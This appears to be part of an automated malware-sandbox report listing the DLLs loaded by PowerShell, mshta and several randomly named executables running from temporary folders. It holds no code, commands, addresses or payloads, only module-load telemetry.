Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Section loaded: ucrtbase_clr0400.dll

Source: C:\Users\user\Desktop\file.exe

